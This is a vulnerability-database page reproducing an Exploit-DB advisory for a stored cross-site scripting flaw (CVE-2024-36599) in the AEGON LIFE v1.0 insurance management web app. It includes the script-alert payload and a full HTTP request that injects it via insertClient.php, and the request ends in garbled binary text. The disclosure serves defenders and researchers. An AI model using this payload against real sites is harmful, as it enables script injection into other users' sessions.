Lucene search
Aslam Anwar MahimkarEDB-ID:52042HistoryJun 14, 2024 - 12:00 a.m.
AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)
2024-06-1400:00:00
Aslam Anwar Mahimkar
www.exploit-db.com
160
aegon life v1.0
cross-site scripting
web application
linux
cve-2024-36599
burp suite
payload
exploit title
vendor homepage
software link
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
6.6
Confidence
Low
EPSS
0.001
Percentile
16.8%
# Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599
# Description:
----------------
A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.
# Payload:
----------------
<script>alert(document.domain)</script>
# Attack Vectors:
-------------------------
To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.
# Burp Suite Request:
----------------------------
POST /lims/insertClient.php HTTP/1.1
Host: localhost
Content-Length: 30423
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/lims/addClient.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
Connection: close
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_id"
1716051159
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="client_password"
password
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="name"
<script>alert(document.domain)</script>
------WebKitFormBoundarymKfAe0x95923LzQH
Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"
Content-Type: application/octet-stream
ΓΏΓΓΏΓ Related
packetstorm
packetstorm
AEGON LIFE 1.0 Cross Site Scripting
2024-06-14 00:00:00
zdt
zdt
cvelist
cvelist
CVE-2024-36599
2024-06-14 00:00:00
vulnrichment
vulnrichment
CVE-2024-36599
2024-06-14 00:00:00
cve
cve
CVE-2024-36599
2024-06-14 18:15:27
nvd
nvd
CVE-2024-36599
2024-06-14 18:15:27
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
6.6
Confidence
Low
EPSS
0.001
Percentile
16.8%
Related for EDB-ID:52042